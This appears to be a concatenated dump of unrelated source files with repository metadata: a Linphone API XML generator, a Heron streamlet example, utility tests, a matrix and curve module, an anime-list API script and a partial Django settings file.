CObject.__init__(self, name) self.definition = definition.strip() class CArgument(CObject): def __init__(self, t, name = '', enums = [], structs = []): CObject.__init__(self, name) self.description = None self.containedType = None keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ] fullySplittedType = [] splittedType = t.strip().split(' ') for s in splittedType: if s.startswith('*'): fullySplittedType.append('*') if len(s) > 1: fullySplittedType.append(s[1:]) elif s.endswith('*'): fullySplittedType.append(s[:-1]) fullySplittedType.append('*') else: fullySplittedType.append(s) if 'MS2_DEPRECATED' in fullySplittedType: fullySplittedType.remove('MS2_DEPRECATED') elif 'LINPHONE_DEPRECATED' in fullySplittedType: fullySplittedType.remove('LINPHONE_DEPRECATED') isStruct = False isEnum = False self.ctype = 'int' # Default to int so that the result is correct eg. 
for 'unsigned short' for s in fullySplittedType: if not s in keywords: self.ctype = s if s == 'struct': isStruct = True if s == 'enum': isEnum = True if isStruct: for st in structs: if st.associatedTypedef is not None: self.ctype = st.associatedTypedef.name elif isEnum: for e in enums: if e.associatedTypedef is not None: self.ctype = e.associatedTypedef.name if self.ctype == 'int' and 'int' not in fullySplittedType: if fullySplittedType[-1] == '*': fullySplittedType.insert(-1, 'int') else: fullySplittedType.append('int') self.completeType = ' '.join(fullySplittedType) def __str__(self): return self.completeType + " " + self.name class CArgumentsList: def __init__(self): self.arguments = [] def addArgument(self, arg): self.arguments.append(arg) def __len__(self): return len(self.arguments) def __getitem__(self, key): return self.arguments[key] def __str__(self): argstr = [] for arg in self.arguments: argstr.append(str(arg)) return ', '.join(argstr) class CFunction(CObject): def __init__(self, name, returnarg, argslist): CObject.__init__(self, name) self.returnArgument = returnarg self.arguments = argslist self.location = None class CEvent(CFunction): pass class CProperty: def __init__(self, name): self.name = name self.getter = None self.setter = None class CClass(CObject): def __init__(self, st): CObject.__init__(self, st.associatedTypedef.name) if st.deprecated or st.associatedTypedef.deprecated: self.deprecated = True if len(st.associatedTypedef.briefDescription) > 0: self.briefDescription = st.associatedTypedef.briefDescription elif len(st.briefDescription) > 0: self.briefDescription = st.briefDescription if st.associatedTypedef.detailedDescription is not None: self.detailedDescription = st.associatedTypedef.detailedDescription elif st.detailedDescription is not None: self.detailedDescription = st.detailedDescription self.__struct = st self.events = {} self.classMethods = {} self.instanceMethods = {} self.properties = {} self.__computeCFunctionPrefix() def __computeCFunctionPrefix(self): self.cFunctionPrefix = '' first = True for l in self.name: if l.isupper() and not first: self.cFunctionPrefix += '_' self.cFunctionPrefix += l.lower() first = False self.cFunctionPrefix += '_' def __addPropertyGetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].getter = f def __addPropertySetter(self, name, f): if not name in self.properties: prop = CProperty(name) self.properties[name] = prop self.properties[name].setter = f def __addClassMethod(self, f): if not f.name in self.classMethods: self.classMethods[f.name] = f def __addInstanceMethod(self, f): name = f.name[len(self.cFunctionPrefix):] if name.startswith('get_') and len(f.arguments) == 1: self.__addPropertyGetter(name[4:], f) elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t': self.__addPropertyGetter(name, f) elif name.startswith('set_') and len(f.arguments) == 2: self.__addPropertySetter(name[4:], f) elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t': self.__addPropertySetter(name[7:] + '_enabled', f) else: if not f.name in self.instanceMethods: self.instanceMethods[f.name] = f def addEvent(self, ev): if not ev.name in self.events: self.events[ev.name] = ev def addMethod(self, f): if len(f.arguments) > 0 and f.arguments[0].ctype == self.name: 
self.__addInstanceMethod(f) else: self.__addClassMethod(f) class Project: def __init__(self): self.verbose = False self.prettyPrint = False self.enums = [] self.__structs = [] self.__typedefs = [] self.__events = [] self.__functions = [] self.classes = [] self.docparser = metadoc.Parser() def add(self, elem): if isinstance(elem, CClass): if self.verbose: print("Adding class " + elem.name) self.classes.append(elem) elif isinstance(elem, CEnum): if self.verbose: print("Adding enum " + elem.name) for ev in elem.values: print("\t" + ev.name) self.enums.append(elem) elif isinstance(elem, CStruct): if self.verbose: print("Adding struct " + elem.name) for sm in elem.members: print("\t" + sm.ctype + " " + sm.name) self.__structs.append(elem) elif isinstance(elem, CTypedef): if self.verbose: print("Adding typedef " + elem.name) print("\t" + elem.definition) self.__typedefs.append(elem) elif isinstance(elem, CEvent): if self.verbose: print("Adding event " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__events.append(elem) elif isinstance(elem, CFunction): if self.verbose: print("Adding function " + elem.name) print("\tReturns: " + elem.returnArgument.ctype) print("\tArguments: " + str(elem.arguments)) self.__functions.append(elem) def __cleanDescription(self, descriptionNode): for para in descriptionNode.findall('./para'): for n in para.findall('./parameterlist'): para.remove(n) for n in para.findall("./simplesect[@kind='return']"): para.remove(n) for n in para.findall("./simplesect[@kind='see']"): t = ''.join(n.itertext()) n.clear() n.tag = 'see' n.text = t for n in para.findall("./simplesect[@kind='note']"): n.tag = 'note' n.attrib = {} for n in para.findall(".//xrefsect"): para.remove(n) for n in para.findall('.//ref'): n.attrib = {} for n in para.findall(".//bctbx_list"): para.remove(n) if descriptionNode.tag == 'parameterdescription': descriptionNode.tag = 'description' if descriptionNode.tag == 'simplesect': descriptionNode.tag = 'description' descriptionNode.attrib = {} return descriptionNode def __canBeWrapped(self, node): return node.find('./detaileddescription//donotwrap') is None def __discoverClasses(self): for td in self.__typedefs: if td.definition.startswith('enum '): for e in self.enums: if (e.associatedTypedef is None) and td.definition[5:] == e.name: e.associatedTypedef = td break elif td.definition.startswith('struct '): structFound = False for st in self.__structs: if (st.associatedTypedef is None) and td.definition[7:] == st.name: st.associatedTypedef = td structFound = True break if not structFound: name = td.definition[7:] print("Structure with no associated typedef: " + name) st = CStruct(name) st.associatedTypedef = td self.add(st) for td in self.__typedefs: if td.definition.startswith('struct '): for st in self.__structs: if st.associatedTypedef == td: cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(cclass) break elif ('Linphone' + td.definition) == td.name: st = CStruct(td.name) st.associatedTypedef = td cclass = CClass(st) cclass.briefDoc = td.briefDoc self.add(st) self.add(cclass) # Sort classes by length of name (longest first), so that methods are put in the right class self.classes.sort(key = lambda c: len(c.name), reverse = True) for e in self.__events: eventAdded = False for c in self.classes: if c.name.endswith('Cbs') and e.name.startswith(c.name): c.addEvent(e) eventAdded = True break if not eventAdded: for c in self.classes: if e.name.startswith(c.name): c.addEvent(e) eventAdded = True 
break for f in self.__functions: for c in self.classes: if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]: c.addMethod(f) break def __parseCEnumValueInitializer(self, initializer): initializer = initializer.strip() if not initializer.startswith('='): return None initializer = initializer[1:] initializer.strip() return initializer def __parseCEnumValue(self, node): ev = CEnumValue(node.find('./name').text) initializerNode = node.find('./initializer') if initializerNode is not None: ev.value = self.__parseCEnumValueInitializer(initializerNode.text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: ev.deprecated = True ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return ev def __parseCEnumMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None e = CEnum(node.find('./name').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: e.deprecated = True e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() e.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) enumvalues = node.findall("enumvalue[@prot='public']") for enumvalue in enumvalues: ev = self.__parseCEnumValue(enumvalue) e.addValue(ev) return e def __findCEnum(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']") for m in memberdefs: e = self.__parseCEnumMemberdef(m) self.add(e) def __parseCStructMember(self, node, structname): name = node.find('./name').text definition = node.find('./definition').text t = definition[0:definition.find(structname + "::" + name)] sm = CStructMember(name, t) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: sm.deprecated = True sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return sm def __parseCStructCompounddef(self, node): s = CStruct(node.find('./compoundname').text) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: s.deprecated = True s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() s.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']") for structmember in structmembers: sm = self.__parseCStructMember(structmember, s.name) s.addMember(sm) return s def __findCStruct(self, tree): compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']") for c in compounddefs: s = self.__parseCStructCompounddef(c) self.add(s) def __parseCTypedefMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None name = node.find('./name').text definition = node.find('./definition').text if definition.startswith('typedef '): definition = definition[8 :] if name.endswith('Cb'): pos = definition.find("(*") if pos == -1: return None returntype = 
definition[0:pos].strip() returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" definition = definition[pos + 2 :] pos = definition.find("(") definition = definition[pos + 1 : -1] argslist = CArgumentsList() for argdef in definition.split(', '): argType = '' starPos = argdef.rfind('*') spacePos = argdef.rfind(' ') if starPos != -1: argType = argdef[0 : starPos + 1] argName = argdef[starPos + 1 :] elif spacePos != -1: argType = argdef[0 : spacePos] argName = argdef[spacePos + 1 :] argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) f = CEvent(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return f else: pos = definition.rfind(" " + name) if pos != -1: definition = definition[0 : pos] td = CTypedef(name, definition) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: td.deprecated = True td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() td.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) return td return None def __findCTypedef(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']") for m in memberdefs: td = self.__parseCTypedefMemberdef(m) self.add(td) def __parseCFunctionMemberdef(self, node): if not Project.__canBeWrapped(self, node): return None internal = node.find("./detaileddescription/internal") if internal is not None: return None missingDocWarning = '' name = node.find('./name').text t = ''.join(node.find('./type').itertext()) returnarg = CArgument(t, enums = self.enums, structs = self.__structs) returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']") if returndesc is not None: if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t': n = returndesc.find('.//bctbxlist') if n is not None: returnarg.containedType = n.text returnarg.description = self.__cleanDescription(returndesc) elif returnarg.completeType != 'void': missingDocWarning += "\tReturn value is not documented\n" argslist = CArgumentsList() 
argslistNode = node.findall('./param') for argNode in argslistNode: argType = ''.join(argNode.find('./type').itertext()) argName = '' argNameNode = argNode.find('./declname') if argNameNode is not None: argName = ''.join(argNameNode.itertext()) if argType != 'void': argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t': n = paramdesc.find('.//bctbxlist') if n is not None: arg.containedType = n.text arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; f = CFunction(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '': return None locationNode = node.find('./location') if locationNode is not None: f.location = locationNode.get('file') if not f.location.endswith('.h'): missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) return f def __findCFunction(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']") for m in memberdefs: f = self.__parseCFunctionMemberdef(m) if f is not None: self.add(f) def initFromFiles(self, xmlfiles): trees = [] for f in xmlfiles: tree = None try: if self.verbose: print("Parsing XML file: " + f.name) tree = ET.parse(f) except ET.ParseError as e: print(e) if tree is not None: trees.append(tree) for tree in trees: self.__findCEnum(tree) for tree in trees: self.__findCStruct(tree) for tree in trees: self.__findCTypedef(tree) for tree in trees: self.__findCFunction(tree) self.__discoverClasses() def initFromDir(self, xmldir): files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ] self.initFromFiles(files) def check(self): for c in self.classes: for name, p in six.iteritems(c.properties): if p.getter is None and p.setter is not None: print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter") class Generator: def __init__(self, outputfile): self.__outputfile = outputfile def __generateEnum(self, cenum, enumsNode): enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() } if cenum.associatedTypedef is not None: enumNodeAttributes['name'] = cenum.associatedTypedef.name enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes) if cenum.briefDescription != '': enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription') enumBriefDescriptionNode.text = cenum.briefDescription enumNode.append(cenum.detailedDescription) if len(cenum.values) > 0: enumValuesNode = ET.SubElement(enumNode, 
'values') for value in cenum.values: enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() } valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes) if value.briefDescription != '': valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription') valueBriefDescriptionNode.text = value.briefDescription valueNode.append(value.detailedDescription) def __generateFunction(self, parentNode, nodeName, f): functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() } if f.location is not None: functionAttributes['location'] = f.location functionNode = ET.SubElement(parentNode, nodeName, functionAttributes) returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType } if f.returnArgument.containedType is not None: returnValueAttributes['containedtype'] = f.returnArgument.containedType returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes) if f.returnArgument.description is not None: returnValueNode.append(f.returnArgument.description) argumentsNode = ET.SubElement(functionNode, 'arguments') for arg in f.arguments: argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType } if arg.containedType is not None: argumentNodeAttributes['containedtype'] = arg.containedType argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes) if arg.description is not None: argumentNode.append(arg.description) if f.briefDescription != '': functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription') functionBriefDescriptionNode.text = f.briefDescription functionNode.append(f.detailedDescription) def __generateClass(self, cclass, classesNode): # Do not include classes that contain nothing if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \ len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0: return # Check the capabilities of the class has_ref_method = False has_unref_method = False has_destroy_method = False for methodname in cclass.instanceMethods: methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '') if methodname_without_prefix == 'ref': has_ref_method = True elif methodname_without_prefix == 'unref': has_unref_method = True elif methodname_without_prefix == 'destroy': has_destroy_method = True refcountable = False destroyable = False if has_ref_method and has_unref_method: refcountable = True if has_destroy_method: destroyable = True classNodeAttributes = { 'name' : cclass.name, 'cfunctionprefix' : cclass.cFunctionPrefix, 'deprecated' : str(cclass.deprecated).lower(), 'refcountable' : str(refcountable).lower(), 'destroyable' : str(destroyable).lower() } # Generate the XML node for the class classNode = ET.SubElement(classesNode, 'class', classNodeAttributes) if len(cclass.events) > 0: eventsNode = ET.SubElement(classNode, 'events') eventnames = [] for eventname in cclass.events: eventnames.append(eventname) eventnames.sort() for eventname in eventnames: self.__generateFunction(eventsNode, 'event', cclass.events[eventname]) if len(cclass.classMethods) > 0: classMethodsNode = ET.SubElement(classNode, 'classmethods') methodnames = [] for methodname in cclass.classMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname]) if len(cclass.instanceMethods) > 0: instanceMethodsNode = ET.SubElement(classNode, 
'instancemethods') methodnames = [] for methodname in cclass.instanceMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname]) if len(cclass.properties) > 0: propertiesNode = ET.SubElement(classNode, 'properties') propnames = [] for propname in cclass.properties: propnames.append(propname) propnames.sort() for propname in propnames: propertyNodeAttributes = { 'name' : propname } propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes) if cclass.properties[propname].getter is not None: self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter) if cclass.properties[propname].setter is not None: self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter) if cclass.briefDescription != '': classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription') classBriefDescriptionNode.text = cclass.briefDescription classNode.append(cclass.detailedDescription) def generate(self, project): print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'") apiNode = ET.Element('api') project.enums.sort(key = lambda e: e.name) if len(project.enums) > 0: enumsNode = ET.SubElement(apiNode, 'enums') for cenum in project.enums: self.__generateEnum(cenum, enumsNode) if len(project.classes) > 0: classesNode = ET.SubElement(apiNode, 'classes') project.classes.sort(key = lambda c: c.name) for cclass in project.classes: self.__generateClass(cclass, classesNode) s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8') s += ET.tostring(apiNode, 'utf-8') if project.prettyPrint: s = minidom.parseString(s).toprettyxml(indent='\t') self.__outputfile.write(s) def main(argv = None): if argv is None: argv = sys.argv argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.") argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.") argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true') argparser.add_argument('--pretty', help="XML pretty print", action='store_true') argparser.add_argument('xmldir', help="XML directory generated by doxygen.") args = argparser.parse_args() if args.outputfile == None: args.outputfile = open('api.xml', 'w') project = Project() if args.verbose: project.verbose = True if args.pretty: project.prettyPrint = True project.initFromDir(args.xmldir) project.check() gen = Generator(args.outputfile) gen.generate(project) if __name__ == "__main__": sys.exit(main())
2.21875
2
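The generator above is normally invoked through main(), but the classes can be driven directly; this sketch mirrors main()'s defaults (the 'xml' path is illustrative):

# Sketch: parse doxygen XML and emit api.xml programmatically.
project = Project()
project.verbose = True
project.initFromDir('xml')   # directory of doxygen-generated XML files
project.check()
with open('api.xml', 'w') as outputfile:
    Generator(outputfile).generate(project)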
examples/src/python/join_streamlet_topology.py
aaronstjohn/incubator-heron
2
1873
<filename>examples/src/python/join_streamlet_topology.py #!/usr/bin/env python # -*- encoding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. '''join_streamlet_topology.py: module is an example of how to use the join operator''' import sys from heronpy.streamlet.builder import Builder from heronpy.streamlet.runner import Runner from heronpy.streamlet.config import Config from heronpy.streamlet.windowconfig import WindowConfig from heronpy.connectors.mock.arraylooper import ArrayLooper # pylint: disable=superfluous-parens if __name__ == '__main__': if len(sys.argv) != 2: print("Topology's name is not specified") sys.exit(1) builder = Builder() source_1 = builder.new_source(ArrayLooper([["key1", "a"], ["key1", "b"]], sleep=1)) source_2 = builder.new_source(ArrayLooper([["key1", "c"], ["key1", "d"]], sleep=1)) source_1.join(source_2, WindowConfig.create_sliding_window(2, 1), lambda x, y: x + y).log() runner = Runner() config = Config() runner.run(sys.argv[1], config, builder)
2.0625
2
yolk/test/utils.py
yolkdata/yolk-python
0
1874
<reponame>yolkdata/yolk-python from datetime import date, datetime, timedelta from decimal import Decimal import unittest from dateutil.tz import tzutc import six from yolk import utils class TestUtils(unittest.TestCase): def test_timezone_utils(self): now = datetime.now() utcnow = datetime.now(tz=tzutc()) self.assertTrue(utils.is_naive(now)) self.assertFalse(utils.is_naive(utcnow)) fixed = utils.guess_timezone(now) self.assertFalse(utils.is_naive(fixed)) shouldnt_be_edited = utils.guess_timezone(utcnow) self.assertEqual(utcnow, shouldnt_be_edited) def test_clean(self): simple = { 'decimal': Decimal('0.142857'), 'unicode': six.u('woo'), 'date': datetime.now(), 'long': 200000000, 'integer': 1, 'float': 2.0, 'bool': True, 'str': 'woo', 'none': None } complicated = { 'exception': Exception('This should show up'), 'timedelta': timedelta(microseconds=20), 'list': [1, 2, 3] } combined = dict(simple.items()) combined.update(complicated.items()) pre_clean_keys = combined.keys() utils.clean(combined) self.assertEqual(combined.keys(), pre_clean_keys) def test_clean_with_dates(self): dict_with_dates = { 'birthdate': date(1980, 1, 1), 'registration': datetime.utcnow(), } self.assertEqual(dict_with_dates, utils.clean(dict_with_dates)) @classmethod def test_bytes(cls): if six.PY3: item = bytes(10) else: item = bytearray(10) utils.clean(item) def test_clean_fn(self): cleaned = utils.clean({'fn': lambda x: x, 'number': 4}) self.assertEqual(cleaned['number'], 4) if 'fn' in cleaned: self.assertEqual(cleaned['fn'], None) def test_remove_slash(self): self.assertEqual('http://segment.io', utils.remove_trailing_slash('http://segment.io/')) self.assertEqual('http://segment.io', utils.remove_trailing_slash('http://segment.io'))
2.59375
3
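The test above pins down the observable contract of utils.clean; compressed into a usage sketch (assumes the yolk package from this record is importable):

# Sketch: clean() passes plain values through and nulls or drops callables.
from yolk import utils

cleaned = utils.clean({'number': 4, 'fn': lambda x: x})
assert cleaned['number'] == 4
assert cleaned.get('fn') is None  # either dropped or set to None, per the test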
09Scan/matrix.py
kw1122/MKS66
0
1875
<reponame>kw1122/MKS66<gh_stars>0 """ A matrix will be an N sized list of 4 element lists. Each individual list will represent an [x, y, z, 1] point. For multiplication purposes, consider the lists like so: x0 x1 xn y0 y1 yn z0 z1 ... zn 1 1 1 """ import math def make_bezier(): return [ [-1, 3, -3, 1], [3, -6, 3, 0], [-3, 3, 0, 0], [1, 0, 0, 0] ] def make_hermite(): return [ [2, -3, 0, 1], [-2, 3, 0, 0], [1, -2, 1, 0], [1, -1, 0, 0] ] def generate_curve_coefs(p0, p1, p2, p3, t): coefs = [[p0, p1, p2, p3]] if t == 'hermite': curve = make_hermite() else: curve = make_bezier() matrix_mult(curve, coefs) return coefs def make_translate(x, y, z): t = new_matrix() ident(t) t[3][0] = x t[3][1] = y t[3][2] = z return t def make_scale(x, y, z): t = new_matrix() ident(t) t[0][0] = x t[1][1] = y t[2][2] = z return t def make_rotX(theta): t = new_matrix() ident(t) t[1][1] = math.cos(theta) t[2][1] = -math.sin(theta) t[1][2] = math.sin(theta) t[2][2] = math.cos(theta) return t def make_rotY(theta): t = new_matrix() ident(t) t[0][0] = math.cos(theta) t[0][2] = -math.sin(theta) t[2][0] = math.sin(theta) t[2][2] = math.cos(theta) return t def make_rotZ(theta): t = new_matrix() ident(t) t[0][0] = math.cos(theta) t[1][0] = -math.sin(theta) t[0][1] = math.sin(theta) t[1][1] = math.cos(theta) return t #print the matrix such that it looks like #the template in the top comment def print_matrix(matrix): s = '' for r in range(len(matrix[0])): for c in range(len(matrix)): s+= str(matrix[c][r]) + ' ' s += '\n' print (s) #turn the paramter matrix into an identity matrix #you may assume matrix is square def ident(matrix): for r in range(len(matrix[0])): for c in range(len(matrix)): if r == c: matrix[c][r] = 1 else: matrix[c][r] = 0 #multiply m1 by m2, modifying m2 to be the product #m1 * m2 -> m2 def matrix_mult(m1, m2): point = 0 for row in m2: #get a copy of the next point tmp = row[:] for r in range(4): m2[point][r] = (m1[0][r] * tmp[0] + m1[1][r] * tmp[1] + m1[2][r] * tmp[2] + m1[3][r] * tmp[3]) point += 1 def new_matrix(rows = 4, cols = 4): m = [] for c in range(cols): m.append([]) for r in range(rows): m[c].append(0) return m
3.53125
4
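A quick check of the conventions documented at the top of the module: each point is an [x, y, z, 1] list, and matrix_mult rewrites its second argument in place.

# Sketch: rotate the x-axis unit point 90 degrees about Z.
import math

rot = make_rotZ(math.pi / 2)
points = [[1, 0, 0, 1]]   # one [x, y, z, 1] point
matrix_mult(rot, points)
print(points)             # ~[[0.0, 1.0, 0.0, 1]]: x maps onto y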
tests/test.py
Nekmo/spice
0
1876
<reponame>Nekmo/spice<gh_stars>0 from bs4 import BeautifulSoup import requests import sys, os from time import sleep sys.path.insert(0, '/home/may/Dropbox/Programming/spice/') import spice_api as spice def main(): creds = spice.load_auth_from_file('auth') print(creds) results = spice.search('Re:Zero Kara Hajimeru Isekai Seikatsu', spice.get_medium('anime'), creds) print(results[0].title) souma = spice.search_id(1, spice.get_medium('manga'), creds) print(souma.raw_data) print(souma.title) print(souma.chapters) print(souma.volumes) re_zero_data = spice.get_blank(spice.get_medium('anime')) re_zero_data.episodes = 0 re_zero_data.status = spice.get_status('reading') re_zero_data.score = 8 re_zero_data.tags = ['this the first time a show that made me cringe'] shokugeki_data = spice.get_blank(spice.get_medium('manga')) shokugeki_data.chapters = 13 shokugeki_data.volumes = 1 shokugeki_data.status = 1 shokugeki_data.score = 8 spice.update(shokugeki_data, 45757, spice.get_medium('manga'), creds) anime_list = spice.get_list(spice.get_medium('ANIME'), 'Utagai-', creds) print(anime_list.avg_score()) print(anime_list.median_score()) print(anime_list.mode_score()) print(anime_list.extremes()) print(anime_list.p_stddev()) print(anime_list.p_var()) print(anime_list.get_num_status(1)) print(anime_list.get_total()) print(anime_list.get_days()) print(anime_list.exists(11734)) print(len(anime_list.get_ids())) print(len(anime_list.get_titles())) print(anime_list.get_status(1)) print(anime_list.get_score(10)) print(anime_list.exists_as_status(11734, 1)) print(anime_list.score_diff()) anime_list2 = spice.get_list(spice.get_medium('ANIME'), 'Pickleplatter', creds) print("Similarity coefficient: {}".format(anime_list.compatibility(anime_list2))) if __name__ == '__main__': main()
2.265625
2
backend/project/settings.py
prog-serhii/MyMoney_v2
1
1877
import os from pathlib import Path from datetime import timedelta from celery.schedules import crontab from django.utils.translation import gettext_lazy as _ # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent SECRET_KEY = os.environ.get( 'SECRET_KEY', default='<KEY> ) # SECURITY WARNING: don't run with debug turned on in production! DEBUG = int(os.environ.get('DEBUG', default=1)) # 'DJANGO_ALLOWED_HOSTS' should be a single string of hosts with a space between each. # For example: 'DJANGO_ALLOWED_HOSTS=localhost 127.0.0.1 [::1]' ALLOWED_HOSTS = os.environ.get("DJANGO_ALLOWED_HOSTS", default='*').split(" ") # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', 'django_filters', 'rosetta', 'djoser', 'djmoney', 'djmoney.contrib.exchange', 'corsheaders', 'apps.account.apps.AccountConfig', 'apps.transaction.apps.TransactionConfig', 'apps.common.apps.CommonConfig', 'apps.authentication.apps.AuthenticationConfig' ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware' ] 